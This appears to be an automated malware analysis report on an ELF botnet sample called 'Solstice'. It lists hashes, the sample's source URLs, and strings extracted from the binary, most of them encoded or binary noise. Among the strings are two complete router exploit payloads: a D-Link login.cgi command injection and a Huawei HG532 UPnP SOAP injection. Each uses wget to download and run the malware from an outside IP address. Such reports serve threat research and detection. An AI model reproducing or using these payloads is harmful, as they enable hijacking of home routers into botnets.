
Sample details: c6674de554b82c3efd91c922c350556e

Hashes
MD5: c6674de554b82c3efd91c922c350556e
SHA1: 9de9455f46a75945233031332eb44d88f89660f9
SHA256: c4d9b2a060e3e26d27183b850e935018335d9317eefcba3d3acd8530c13b313b
SSDEEP: 1536:hFALnCEJTlDAMWFYXE7Pxujz3YYtsmcpRqMxDFoaEVeFrZCoZi0:hF8CEJTtAMW6XE7Pxun4RpRfDF6VeFrZ
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163:80/bins/Solstice.sh4
http://185.101.105.162/bins/Solstice.sh4
http://185.101.105.162:80/bins/Solstice.sh4
http://185.101.105.163/bins/Solstice.sh4
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
2)%#a)')A
AMB[!+'{!
C;"G7"!
@L-<-<,
62.L1bc
P+#+'2&
7;"r$"!
\-<-T-
3=R'04
2)%#a)')A
AMB[!+'{!
;"s4"!
;"G7"!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
c^|c,a
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#~
2*Uk!r
7zPz](p
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
#{";"E
3a9'CV9")A
	B	B#a
B<cmA{"C
3a9'CV9"
Cc,3Sf
C)#8#b
"Bc#`ra
Gz#:"* 
j"drc7
Sb}B:!Z"
&l`cc	@cb
B#a=A,1
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
g3amA|1Qf
ql22,!!!%
B<cmA{"S
!B!B79
gfffVYB
"+'`7#
R(1f1Y
A3`\139
U2a,5V
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
/dev/null
.shstrtab
.rodata
.ctors
.dtors